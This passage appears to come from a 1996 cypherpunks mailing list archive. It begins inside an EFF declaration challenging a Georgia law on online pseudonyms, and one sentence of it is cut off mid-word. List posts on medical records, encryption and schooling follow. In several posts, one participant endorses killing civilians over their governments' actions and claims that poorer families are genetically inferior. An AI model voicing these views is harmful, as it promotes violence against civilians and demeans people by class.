6. On average, EFF's web page is accessed by Internet users more than 300,000 times every day. Through our web site, EFF transmits between 1.2 to 1.5 gigabytes of information per day. Roughly speaking, this means that EFF's web site transmits the equivalent of 250 to 350 million words, or two entire encyclopedias' worth of information, over computer networks every day. A substantial volume of this information is transmitted into the State of Georgia or through wires located in that State.

7. Although EFF's web site and many of our online resources are based on a computer in California, those resources are accessible to EFF members and other interested individuals throughout the world and in every state of the United States, including the State of Georgia. Similarly, the EFF resources and forums that are maintained on other national commercial online forums can be accessed by those systems' subscribers throughout the United States, including the State of Georgia.

8. EFF routinely advises individuals and groups about their legal rights and responsibilities in the online world. In addition, EFF advocates positions, and promotes discussions, about what those rights and responsibilities should be.
Since virtually all interactions on the Internet and other computer networks are at their essence communication and expression, EFF's policy positions and the discussions we foster strongly emphasize freedom-of-speech concerns. Similarly, because free flow of information made possible by this new online technology creates the possibility of extraordinary intrusion into the privacy of computer users, EFF's policy positions and the discussions we foster strongly emphasize the issues of protection of online privacy, including the right to communicate anonymously over computer networks and the right to use encryption software to prevent unauthorized interception and viewing of private communications sent over computer networks.

9. As a part of EFF's efforts to protect the privacy of online users and in furtherance of free speech, EFF routinely assists our members and members of the general public in protecting their privacy when communicating over the Internet, while at the same time emphasizing the importance of using these privacy rights responsibly. EFF facilitates responsible anonymous communication over computer networks in several ways. For example, many participants in online discussions and chats sponsored by EFF use "handles," i.e., assumed names, rather than their actual names. EFF also provides links on our web page to so-called "anonymous remailers," which are computers on the Internet that will forward Internet e-mail anonymously, allowing an even greater level of privacy for online communications than can be obtained by the use of pseudonyms alone. EFF is aware of and facilitates the responsible use of online handles or pseudonyms, and of communications via anonymous remailers, because the ability to communicate over online networks in this way allows users to participate in chats or discussions groups without abandoning their privacy.
It permits users to participate in these discussions without revealing their name to strangers, and without fear of retaliation for the expression of unpopular or controversial viewpoints. This protection of privacy furthers the public interest by facilitating freer and more frank discussions, especially on controversial issues such as questions of online privacy and encryption software.

10. Similarly, EFF wants to make the information that we publish on such issues freely available to computer network users who seek it but who want to obtain it anonymously, i.e., by requesting it over computer networks using a pseudonym or handle. Again, EFF believes that by protecting the privacy of users by allowing them to obtain information of public interest anonymously, information on these issues can be disseminated more fully and freely over computer networks.

11. In addition, nearly all of EFF's approximately 3500 members use online communications. EFF members both receive and transmit information through a variety of online communications, including the World Wide Web, online mailing lists, discussion groups, chat rooms, computer bulletin boards, and private e-mail. Many of EFF's members use handles or pseudonyms to protect their privacy when communicating over computer networks. Many of these communications pass through the State of Georgia.

12. I have reviewed the language of O.C.G.A. 16-9-93.1, and neither I nor EFF can determine from its language whether communication over computer networks using a pseudonym or assumed name constitutes the use of a name that "falsely identifies" the user for the purposes of the criminal sanctions imposed by this statute.
Because EFF actively facilitates and encourages the responsible use of pseudonyms in online communications for the protection of privacy, however, and because virtually all of the anonymous communications over computer networks facilitated by EFF are as easily accessible in Georgia as anywhere else in the world, EFF is fearful that our activities could be viewed by a Georgia prosecutor as aiding and abetting violations of the statute. Similarly, EFF is concerned on behalf of our members that those members who communicate over computer networks using pseudonyms or handles could be violating this criminal statute. EFF, both on our own behalf and on behalf of our members, therefore fears prosecution or other enforcement in Georgia under the statute, and seeks guidance from the Court as to the effect and scope of this vague law. Although EFF is concerned about the risk of prosecution, EFF views any such restriction on our activities in furtherance of the public interest as patently unconstitutional, and we fully intend to continue our activities in support of online privacy and free speech despite the passage of this law.

13. In addition to the many other services that EFF provides to our members and to the online community in general is the online publication through EFF's web site of an extensive archive of articles and other information of interest to the online community. EFF's archives include information on government and legislative activities, legal issues and cases, academic freedom, censorship, free expression and other civil liberties, the information infrastructure and network resources, intellectual property, privacy and encryption, net culture and the online community, and social responsibility in the use of online resources. Included within these archives are hundreds of hyperlinks from the EFF web site to other information and resources made available by others on the Internet on related topics.
Many of these links use the trade names of the companies, organizations, government agencies or other entities to whom the link is provided. In some cases, EFF uses the logos or other graphical symbols of the organizations to whom we are linking on our web site. EFF does not obtain prior permission from other web publishers before providing links to their web sites in this manner. Given the sheer number of links, EFF could not as a practical matter do so. EFF does not intend to falsely imply that we have obtained such permission or that we are formally affiliated with any of these other entities. EFF is aware that individuals and companies that maintain their own web sites want others to link to their sites as a matter of course. EFF is concerned that its use of these trade names and images could violate the Act and subject EFF or our members to criminal prosecution, when it is the Act, not our actions, that is in defiance of the customary usage and spirit of the Internet.

COMPUTER NETWORKS AFFECTED BY THE RESTRICTIONS OF O.C.G.A. 16-9-93.1

The Global Internet

14. The largest computer network in the world is the Internet. It links a large number of smaller networks set up by universities, industry, nonprofit organizations, governments, and individuals. While estimates can only be approximations due to rapid growth, the Internet is believed to connect at least 59,000 computer networks, 2.2 million computers, 159 countries, and 40 million users. By some estimates, there will be as many as 200 million Internet users by the year 1999.

15. No one owns the Internet.
It is a decentralized global medium of communication and expression in which governments, universities, institutions, corporations, and millions of ordinary people can communicate with each other, express opinions, share ideas, educate themselves, and seek, exchange or publish information on every imaginable topic either to specific recipients or to the entire world almost instantaneously and at minimal cost.

16. Virtually anyone can now use the Internet to communicate with other online users. Anyone with a personal computer, modem, and telephone line can obtain access to the Internet through an Internet Service Provider ("ISP"), usually for a fee. Many businesses, universities, and other institutions have computer networks that are directly connected to the Internet and give their employees, faculty, students, etc., free or low-cost Internet access accounts. For those without a computer or access through work or school, many communities have establ

ternet can travel any number of different paths to get from its origin to its destination. Persons transmitting information over this international computer network have no control over the route their messages take. Any data transmitted over the Internet could potentially travel through the wires or airspace of Georgia.

18. There are hundreds of thousands of Internet users in the State of Georgia, all of whom can communicate with or receive information from any other user on the network anywhere in the world.
Commercial Online Services

19. In addition to the global Internet, communications over the large national computer networks known as "commercial online services," including Prodigy, America Online and CompuServe, are also affected by the Act.

20. These services enable their customers to communicate with other customers, access the Internet, and access other proprietary information and services available only to subscribers. There are more than 12 million subscribers to major commercial online services in the United States and overseas; each of these services have customers in Georgia, who use the service to communicate with others throughout the United States (and in some cases, the world).

Local Bulletin Board Services ("BBSs")

21. The Act also affects communications over thousands of local dial-in computer services known as Bulletin Board Systems, or "BBSs." With a relatively small investment, anyone with a phone line, computer, modem, and proper software can establish a BBS to allow friends, neighbors, customers, or members of the general public to dial in and communicate with each other on topics of common interest. There are several hundred such BBSs in Georgia, operated by individuals, nonprofit organizations, advocacy groups, and businesses. In addition, there are thousands of additional local BBSs in other states, which can be reached from Georgia over long distance telephone lines or through a network of BBS systems, which allows BBS subscribers to communicate with subscribers to other BBSs in Georgia and throughout the country.

THE NATURE OF COMMUNICATION OVER COMPUTER NETWORKS AFFECTED BY THE ACT

22. Computer users communicate with each other over the computer networks described above in many different ways. The content of all of the following types of communications are restricted by the broad language of the Act.

E-Mail

23. E-mail is the basic method of communication over computer networks.
It allows one user to send a message to any other user or users on the network.

24. Because mass mailings via e-mail are relatively easy and inexpensive, e-mail enables any user to publish and distribute information on any topic simply by compiling a mailing list of online users and sending the newsletter to everyone.

Discussion & Chat Groups

25. One of the most popular forms of communication over computer networks are "discussion groups." Discussion groups allow users of computer networks to post messages onto a public computerized bulletin board or to an automated electronic mailing list of subscribers, and to read and respond to messages posted by others participating in the discussion group. Discussion groups have been organized on many different computer networks and on virtually every topic imaginable.

26. On the Internet, the bulletin board discussion groups are known as the "USENET" newsgroups and are arranged by subject matter. There are currently USENET newsgroups on more than 15,000 different subjects, and over 100,000 new messages are posted to these groups each day. In addition, there are many thousands more Internet discussion groups organized through automated mailing lists to subscribers. There are still thousands more organized on the various commercial online services and on local BBSs. All or virtually all of these discussion groups are accessible by computer users in Georgia.

27. Similar to discussion groups are "chat groups," which allow users to engage in real time conversations with each other by typing messages and reading the messages typed by others participating in the "chat." Chat groups also occur over the Internet, commercial online services, and local BBSs. These groups are often set up by particular organizations or online services, but any individual user can form an online "chat."
Some chat groups are organized for social entertainment, and others are organized by a particular sponsor on particular topics to provide a specific forum for discussion of issues or ideas.

28. Online discussion and chat groups create an entirely new public forum -- analogous to the village green -- in which individuals can associate and communicate with others who have common interests and can engage in discussion or debate on every imaginable topic.

Publication and Access to Information: The World Wide Web

29. A third major category of communication on computer networks involves the publication and retrieval of information. Computer networks, and especially the Internet, give individuals of ordinary means a remarkable new power to publish ideas, opinions, poetry, stories, images, video, and sound to the world. This information can then be retrieved by anyone in the world who has access to the network.

30. The World Wide Web is the most popular way to publish and retrieve information on the Internet. Anyone with access to the Internet and proper software can publish "web pages," which may contain text, images, sound and even video. The web is comprised of millions of separate "web sites" that provide content provided by a particular person or organization, and each web site may include one or more different web pages published by the author of the site. Any Internet user anywhere in the world can view the web pages published by others, read their text, look at their images and video, and listen to their sounds.

31. The web was created to serve as the platform for a global, online store of knowledge, containing information from a diversity of sources, and accessible to Internet users around the world. Though information on the web is contained in individual computers, the fact that each of these computers is connected to the Internet through web protocols allows all of the information to become part of a single body of knowledge.
It is currently the most advanced information system on the Internet.

The Importance of Links on the World Wide Web:

32. The web also provides web authors with the unique ability to "link" different web pages on the Internet together. These "links" can be text or images in a web page that, when selected by the reader, automatically transfer the reader to a different location on the Internet. For example, a particular link might transport the reader to a different part of the same web page or to an entirely different web page stored in an entirely different computer anywhere in the world.

33. The author of any web page can create a "link" that points to any other web page published on the Internet, without having to contact the creator of the document. In fact, Internet custom and usage does not require a web author to contact a document creator, and those who create documents expect and hope to have their pages linked to. Many of the plaintiffs publish such links in their web pages.

34. Many pages on the web are published by corporations or organizations that operate under trade names. Links to those web pages are routinely identified by the trade name of the organization or some other logo or trademark that readily identifies the company or organization to whose web page the link is directed.

35. "Search engines" and "directories" on the web are services that collect and organize millions of different links to web pages. "Search engines," such as Yahoo, Alta Vista, and Webcrawler, allow users to search the entire World Wide Web for particular words or phrases. The search engine then provides a list of web pages that contain the search term and allows the user to "link" to the web page of their choice. "Directories" are large databases of web sites arranged according to subject matter, similar to an online card catalog. Directories provide "links" to relevant web sites on particular subjects.

36.
Without these search engines and directories, it would be much more difficult for Internet users to locate and retrieve information of interest on the web. Thus, these search engines and directories provide an essential service to all Internet users. They routinely provide many "links" to web pages using the trade names or logos of the companies or organizations to whom they are linking.

37. This critical linking feature is the defining characteristic of the web. The web is comprised of all web pages in the world, stored in millions of different computers around the globe. The web is the interlocking system of links created by individual users in each individual page. Linking is encouraged on the web, because it ties different web pages on related topics together into a coherent system, even though the individual web pages themselves might be stored in different computers in different parts of the world.

38. "Cyberspace" refers to the combination of all of the online communications systems described above.

WHY PEOPLE COMMUNICATE ANONYMOUSLY IN CYBERSPACE

39. For many of the same reasons that people have historically communicated anonymously through other media like print and the telephone, online users frequently communicate anonymously or pseudonymously in cyberspace.

40. Anonymity allows online users to voice unpopular ideas without fear of retaliation. Citizens can engage in political speech without identifying themselves to the party in power. Victims of crime or disease can request help and advice without stigma.

41. Anonymity also eliminates the potential for discrimination and harassment according to factors like gender and ethnicity. Many women communicate online under gender-neutral pseudonyms to avoid harassing e-mail. This practice is similar to women who list their telephone numbers under their first initials in order to avoid harassing calls.
Similarly, online users may wish to use a pseudonym in order to avoid discrimination or harassment based on names associated with particular ethnic groups.

42. Anonymity also helps online users maintain their privacy. People communicating about unpopular or sensitive issues might suffer unwanted invasions of privacy, both online and offline, if others had access to their real identity. Anonymity also allows famous people to communicate online as "average people," without fear of a privacy invasion.

43. In some cases, anonymity is a necessary security measure. The personal safety of human rights dissidents, domestic abuse victims, and whistle-blowers would be compromised if they could not communicate anonymously.

44. Anonymity also assists users in preventing the collection and potential misuse by third parties of personal information about them. Online communications can be easily tracked, downloaded and stored by anyone; anonymity can prevent unauthorized third parties from tying that information to a particular person.

45. In addition to the advantages of speaking anonymously in cyberspace, online users have many reasons for wanting to access online information anonymously. Many users would be inhibited from accessing controversial, embarrassing, or sensitive information if they first had to reveal their identity. Political information, safe sex information, and information on stigmatizing diseases are just a few examples of content that some users might wish to access anonymously. In addition, because most web sites collect information about visitors, many online users fear that using their real identities would threaten their privacy whenever they access the web.

HOW INDIVIDUALS COMMUNICATE ANONYMOUSLY IN CYBERSPACE

46. As a general rule, communications over computer networks typically include identifying information, such as the sender's return address and message routing information.
This default identification of the speaker differentiates online communication from communication by print and telephone.

47. Online technology, however, provides users with a variety of ways to communicate over computer networks without revealing their identity.

Online Communications Using Pseudonyms or "Screen Names"

48. Many Internet Service Providers, commercial online services, and local BBSs allow users to set up pseudonymous accounts, permitting the user to communicate online using a "screen name," "user name," or "handle" that is a pen name rather than the real name of the account holder. When a user sends mail, publishes newsletters, or participates in discussions or chat groups using this screen name, the message sent is identified as coming from the screen name adopted by the sender.

49. Many service providers allow their users to set up multiple "screen names" or "user names." This feature allows users to use different names for different purposes. For example, a user might use her real name as a "screen name" when communicating by e-mail with someone she knows personally, but use a pen name as a "screen name" when communicating with strangers.

50. Pseudonymous accounts allow users to have a consistent identity in cyberspace without having to reveal their true identity to the people with whom they are communicating.

Anonymous Internet Access Accounts:

51. The use of "screen names" alone, however, does not provide complete anonymity to the user, because the user's service provider knows the true identity of the subscriber. To provide additional privacy, some Internet Service Providers and local BBS operators offer anonymous access accounts. That is, they do not require any identification in order to set up an account for communicating over the network. These accounts provide additional privacy and security to the user because even the service provider has no way to identify the true identity of the user.

Anonymous and Pseudonymous Remailers:

52.
In addition to the use of screen names or anonymous access accounts, there are special services that allow online users who normally communicate online under their real names to send particular messages anonymously or pseudonymously over the Internet. These services are known as pseudonymous and anonymous remailers, and they consist of software programs that run on computers connected to the Internet. When an online user sends e-mail to the remailer address, the remailer strips the identifying information from the message and then forwards the mail to its destination. The recipient receives mail that has no evidence indicating its point of origin. Remailers can be used to send individual e-mail and to post messages to mailing lists or USENET newsgroups.

53. "Pseudonymous remailers" are remailers that set up accounts for repeated use. The operator of a pseudonymous remailer knows the account holder's real e-mail address but provides the account holder with a secret numeric identifier that is used whenever the account holder sends a message through the remailer. Other anonymous users, each with their own secret numeric identifier, can then reply to the anonymous message. This allows users to create a double-blind situation where two or more users can have an ongoing exchange without ever knowing the identity of the other users.

54. Anonymous remailers do not require setting up any account with the service. Any Internet user can use these services by sending an e-mail message to the remailer, which will forward it anonymously to its final destination.

55. Currently, there are over 20 public remailers that any online user may use free of charge.

56. To prevent abuse of such remailers, there are programs available to the public, known as "kill files" and "bozo filters," that provide online users with the means to screen out anonymous messages if they desire. These programs reduce the likelihood of harm from misuse of anonymous remailers.
Online Publishing Under Pseudonyms or Anonymously 57. As in the case of e-mail, many publishers in the online medium choose to do so using pen names. 58. For additional anonymity, some Internet Service Providers also allow persons and organizations to set up and maintain web pages anonymously. Anonymous Access Services: 59. Conversely, many online users seek to receive information anonymously over the Internet. As a general rule, however, obtaining information anonymously over the Internet is difficult because every time an online user visits a web site, she leaves a digital "calling card" that reveals the address of the computer from which she is linked to the Internet, the address of the web site she last visited, the kind of computer she is using, and other details. Most web sites keep logs with this information on all of the visitors that access their sites. 60. Many online users fear that their privacy will be invaded if data collected by web sites is misused, particularly where the user has no knowledge of the amount of data being collected by various web site operators. 61. To assist online users in protecting their privacy, there are now services that allow online users to access information anonymously on the Internet. These services, called "anonymizers," serve as middlemen between the user and the par ticular pages he wants to retrieve. An anonymizer strips all references to the user's e-mail address, computer type, and previous page visited before downloading the web page to the user. If the user follows a link from a page accessed through the anonymizer, the linked page is also accessed anonymously. I, Shari Steele, declare under penalty of perjury that the foregoing is true and correct. Executed this ______ day of September, 1996. ________________________________ SHARI STEELE STAFF COUNSEL ELECTRONIC FRONTIER FOUNDATION From tcmay at got.net Wed Sep 25 19:09:17 1996 From: tcmay at got.net (Timothy C. 
May) Date: Thu, 26 Sep 1996 10:09:17 +0800 Subject: Medical Data Message-ID: At 2:28 PM 9/25/96, Phil Fraering wrote: >Of course, one area where the doctor will continue to hold a patient's >records, instead of the patient, due to the nature of the current system: > >Prescription medication. > Digitally signed prescriptions from qualified doctors. (Not that I support this system...I rather like the "anarchy" of Mexico, where one walks into a pharmacy in Tijuana and can buy purt near anything). >Of course, with the really big problems with this stuff, drug >interactions, there's still no system for a doctor to find out what you're >on thanks to another doctor. Which is why it's very important to always >use the same pharmacist. The lesson of the last decade has been that _interested patients_ often do more research about their conditions and various drug effects than their doctors can. (This happened with a friend of mine, who ultimately died, and a similar case was recently detailed about Andy Grove, of Intel, who did exhaustive research on the Net about his condition...making him (finally) a real user of the Net. There was also a movie, "Lorenzo's Oil," about this exact situation.) In any case, the issue of which drugs one may be taking and maintenance of "drug interaction databases" is not a core issue. One can selectively release the list of drugs being considered to an "oracle" machine, and check for dangerous interactions. Or tell the physician, which is certainly no worse than the current situation. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. 
"National borders aren't even speed bumps on the information superhighway." From ses at tipper.oit.unc.edu Wed Sep 25 19:14:31 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 26 Sep 1996 10:14:31 +0800 Subject: Possible snake oil? In-Reply-To: Message-ID: 1024 bit keylengths are commonly used with RSA, and are generally considered to be secure. Remember, key lengths can't easily be compared between algorithms from radically different familys Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From dbell at maths.tcd.ie Wed Sep 25 19:18:34 1996 From: dbell at maths.tcd.ie (Derek Bell) Date: Thu, 26 Sep 1996 10:18:34 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <3.0b24.32.19960924064658.006b3540@mail.teleport.com> Message-ID: <9609251925.aa18524@salmon.maths.tcd.ie> In message <3.0b24.32.19960924064658.006b3540 at mail.teleport.com>, Rich Burrough s writes: >At 08:33 PM 9/23/96 -0700, tcmay at got.net (Timothy C. May) wrote in response to PH-B: >>I for one don't respond well to extortion threats, so write your damned >>article. I agree; PH-B is commiting a bunch of fallacies here and tarring all cypherpunks with the same brush as Jim Bell just because they haven't repudiated Assasination Politics is just being obnoxious. >I personally don't have the time or energy to contribute to the AP threads. >That != approval for the idea. Ditto; I could spend time analysing AP, but life's too short to waste it on refuting everything I disagree with in detail. 
Derek "who is _not_ Jim" Bell From dlv at bwalk.dm.com Wed Sep 25 19:19:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 10:19:17 +0800 Subject: AP In-Reply-To: <9609251845.aa16492@salmon.maths.tcd.ie> Message-ID: Derek Bell writes: > In message , "Dr.Dimitri Vulis KOTM" writes: > >Yes, I do. > > I'm not sure what you mean here. Is it: > 1. You hold people respobsible for what they did, not what their government > did. (Assuming said people didn't take part in what the government did.) > > 2. You agree that the IRA could justify killing any British citizen, even if > said citizen supported the IRA or agreed with its aims. > > 3. Something else. (Please specify.) (Redirected to the list.) Any British citizen, irrespective of s/he thinks about the IRA, has benefited economically from the 800 years of pillaging and genocide in Ireland. I see no problem if they pay with their lives for these crimes. Likewise I see no problem if U.S. civilians pay with their lives for their government's crimes in Iraq, even if they happen to disapprove of these crimes. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Wed Sep 25 19:21:01 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 10:21:01 +0800 Subject: Medical Data Message-ID: At 4:27 PM 9/25/96, Asgaard wrote: >On Tue, 24 Sep 1996, Timothy C. May wrote: > >> Why can't patients carry their _own_ medical records, and disclose what >> they wish to disclose to doctors and hospitals, as they see fit? Whether >> implemented in a high-tech version, as a "smart card," or a low-tech >> version, as a "dossier" (a file folder), the principle's the same. > >One problem is when a patient is suing his doctor, but claiming that his >'dossier' was lost in a fire. 
The doctor then has to defend himself >with only 'your word against mine' instead of having his own account >of what was happening on file, including test results etc that could >be very interesting for the defence. Well, this is a potentially confusing hypothetical, and a short paragraph description doesn't do it justice. - did not the patient have backups? if not, why not? - the doctor will have records of what _he_ did, and records of _what was disclosed to him_ by the patient. This should be enough, as his "end" has done exactly what was agreed to. (Indeed, the unrevealed parts of the dossier are not known to him, but then they were "unrevealed," which is the whole point. That the "unrevealed" parts were lost or destroyed in a head crash, or whatever, is not germane at all.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From themom at nando.net Wed Sep 25 19:28:12 1996 From: themom at nando.net (themom) Date: Thu, 26 Sep 1996 10:28:12 +0800 Subject: Public Schools In-Reply-To: Message-ID: On Tue, 24 Sep 1996, Dan Harmon wrote: > > > On Tue, 24 Sep 1996, William H. Geiger III wrote: > > > Dan Harmon said: > > > >One of the hardest things that we have to work hardest to counter-act > > >with our twins, who attend PS, is the socialization they > > >pick up at school. > > > > There is an easy solution to that problem, it's called home school. :) > > > Really there is no 'Correct' solution some students function better in Public Schools, some in private and others in home. 
I know of success stories and failures in each. I had a couple of friends who were in home school during their Freshman and Sophomore year in high school but then decided to go back to public school, they were so far behind it wasn't funny...anyways, one dropped out and the other is just now getting back in the "groove" of things (he is a junior). I guess the choice of schools is up to the individual, personally I am a student of a Public school, Enloe High, and truly hate it, I would prefer being in a private school but, I do not have that kind of money to spend, sure I could go to a cheap private school and not have the advantages of the people in public schools which (strangely) have more money. I could also do home school but my parents would drive me insane. But I totally disagree with the posts saying public school students become drug dealers, NONE, of my friends do drugs, drink, smoke, etc... Most students turn out to be functional members of society, with a few odd balls ruining the reputation of the public school system...

That's just my two cents.....

Brent

From levine at blatz.cs.uwm.edu Wed Sep 25 19:33:28 1996
From: levine at blatz.cs.uwm.edu (Prof. L. P. Levine)
Date: Thu, 26 Sep 1996 10:33:28 +0800
Subject: your mail
In-Reply-To:
Message-ID: <199609251822.NAA18129@blatz.cs.uwm.edu>

I am not sure why comp-privacy at uwm.edu should be a part of this discussion. Please take me out of this.

---------------------------------+-----------------------------------------
Leonard P.
Levine | Moderator of: Computer Privacy Digest Professor of Computer Science | and comp.society.privacy University of Wisconsin-Milwaukee | Post: comp-privacy at uwm.edu Box 784, Milwaukee WI 53201 | Information: comp-privacy-request at uwm.edu | Gopher: gopher.cs.uwm.edu levine at cs.uwm.edu | URL: http:/www.uwm.edu/org/comp-privacy/ ---------------------------------+----------------------------------------- >robert, good to hear from you again...what else is new and exciting on your front...norseen > From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 25 19:34:19 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 26 Sep 1996 10:34:19 +0800 Subject: Edited Edupage, 19 Sept 1996 Message-ID: <01I9WCSFW5FY8Y53G5@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 20-SEP-1996 01:52:41.56 >***************************************************************** >Edupage, 19 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >***************************************************************** >LUCENT'S NET SOFTWARE MAKES INTERNET PHONE CALLS EASY >New software developed by Lucent Technologies is designed to give Internet >callers quicker access to one another and allows them to converse via their >computers as if they were on a regular speaker-phone. Previous software has >been half-duplex -- one party must stop speaking before the other can >"capture" the line. Lucent plans to market the software to AT&T, the Bell >companies and Internet service providers for distribution to their >customers. By the end of the year, Lucent plans to enhance the software so >that users can videoconference over the Internet. (Wall Street Journal 18 >Sep 96 B8) I'd wonder if a patch can be built to encrypt each packet as it goes out? 
I'm guessing that what they've done is improve the voice compression, so there will be a relatively small amount of data to encrypt. >PROGRAMMABLE COMPUTER CHIPS >Next month, Metalithic Systems Inc. will release a $1500 sound board called >Digital Wings that uses field-programmable gate array computer chips that >can be personalized, allowing the user to create and edit up to 128 >soundtracks. When used in combination with Windows 95, Digital Wings will >give users access to audio synthesis and editing tools comparable to those >of a professional sound studio. (Business Week 23 Sep 96 p86) I wonder exactly how reprogrammable this system is... >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. >*************************************************************** >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >Alfred Adler (if your name is Alfred Adler; otherwise, substitute your own >name). ... To cancel, send a message to: listproc at educom.unc.edu with the >message: unsubscribe edupage. (If you have subscription problems, send >mail to manager at educom.unc.edu.) From saunders at mcgraw-hill.com Wed Sep 25 19:55:16 1996 From: saunders at mcgraw-hill.com (saunders at mcgraw-hill.com) Date: Thu, 26 Sep 1996 10:55:16 +0800 Subject: your mail Message-ID: <199609251928.AA19822@interlock.mgh.com> whose list is this, and why am I on it? Please delete my name now. ______________________________ Reply Separator _________________________________ Subject: Re: your mail Author: Robert Steele at CCNODE Date: 9/25/96 11:55 AM Requiring people to call Betty to tell her they sent email is very low rent and will discredit the site. Recommend you delete that element. Like putting roller skates on a horse! 
From pgf at acadian.net Wed Sep 25 19:57:58 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 10:57:58 +0800 Subject: Public Schools In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Phil Fraering writes: > > Without vouchers, you don't say anything about the intelligence of your > > test subjects; to a _very_ large degree, intelligence isn't genetic. Or > > That's the political correct thing to say, but do you have any scientific > evidence to support this claim? All the smart people I know with stupid kids? > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps > Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From dlv at bwalk.dm.com Wed Sep 25 20:09:42 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 11:09:42 +0800 Subject: [RANT] Public schools Message-ID: Jay Gairson writes: > First off, what does this have to do with cryptography? or anything > cypher for that matter? Nothing. Neither does most other stuff posted to this list. > On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > > > U.S. public school system is darwinian evolution in action. Parents who > > > > afford to send their kids to private schools, do so. Parents who send t > > > > kids to public schools deserve to have their offsprings fucked up, ment > > > > and phsyically, to improve the species' gene pool. > > So, basically your saying, since my parents cannot afford to pay for a > private school for me, we are genetically inferior to those who can? In general, on the average, yes. > Because hate tell ya, but I've ran into some major idiots that go to > private schools. Also to consider that from the school I go to, last > year we had two perfect sat scores (no problems missed). Oh yes - I've seen idiots at private schools and I've seen smart kids at public schools. They're exceptions. 
Judging from your abuse of the English language, you're not. The cirricula at public schools and the SAT requirements are pretty lame, so any kid willing to spend enough time on them can become a straight A student and feel good about himself/herself. I'm not impressed. > > > But the cutoff is often whether the parents can afford to send their kids > > > to private school, not whether or not they're genetically superior. > > > > You must have attended a public school if you don't understand that geentic > > superiority leads to economic success. My older kid goes to a private scho > > The parents are obviously genetically superior to public school parents. > > I am assuming from what you have said in that statement, that you believe > since he may have gone to a public school, it has made him have the > opinion he does? Opinions change. His snotty attitude toward learning, his propensity to wallow in his stupidity and ignorance the way a pig wallows in its own excrement is a trait commonly acquired in the U.S. public school system. > Also, in your statement that your older kid goes to a private school, and > that the parents are obviously genetically superior to public school > parents. You seem to be saying that YOU are genetically superior to my > parents? I believe myself to be genetically superior to the vast majority of the population. Not knowing much about your parents, other than they can't afford to send you to a better school, I assume that they're part of this vast majority. (Make it both intellectually and physically superior. :-) > Another thing to consider here is, from this line of statements, you are > saying that children who have parents who made it well in, let us say the > movie buisness (or even drug buisness), and then send there children to > public schools, are genetically superior because they can act (lie) > better than my parents. 
For if this is so, that must mean that my aunt > is genetically superior to my mother (who is a teacher at a private > school, but she did not go to a private school) and to her parents, for > she is making more money, and if she ever has children they will be > genetically superior to me, because they will have more money? In general, on the average, yes. I believe that being able to afford a good private school for one's kids is a trait correlated to desirable traits, some of which are inherited by the kids who benefit from the better education. That's eugenics in action. > > Push vouchers. What's the cryptorelevance of your comments, anyway? > > > > Umm, where you not the one that started this conversation? Nope. > > No, on the contrary, sending poor kids to good schools on scholarships > > does not improve their genes. They tend to become drug dealers. > > Hate to inform you on this but, it is more often than not the children > sent by there rich mama and papa to school, that end up on drugs or as > drug dealers, than the ones that start out with scholarships (For the > ones with scholarships have more to loose, than the ones with the rich > mama and papa, for the rich mama and papa can afford the big expensive > lawyer.). Just look at the studies and such done on this type of area. Can you site any such studies? They certainly contradict what I know about this area, and I consider myself pretty well-informed. > Also you have to consider that generally the ones that end up as drug > dealers, are the children who have parents that where drug dealers and > such or had experience in such, or just had parents who didn't care what That's pretty much what I said. Other disciplinary problems (poor attendance, talking back to teachers, weird dress, sex, etc) also tend to be associated with the poor kids admitted on scholarships. 
---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From deviant at pooh-corner.com Wed Sep 25 20:31:05 1996
From: deviant at pooh-corner.com (The Deviant)
Date: Thu, 26 Sep 1996 11:31:05 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To:
Message-ID:

On Wed, 25 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Wed, 25 Sep 96 13:40:17 EDT
> From: "Dr.Dimitri Vulis KOTM"
> To: cypherpunks at toad.com
> Subject: Re: Hallam-Baker demands more repudiations or he'll write!
>
> Phil Fraering writes:
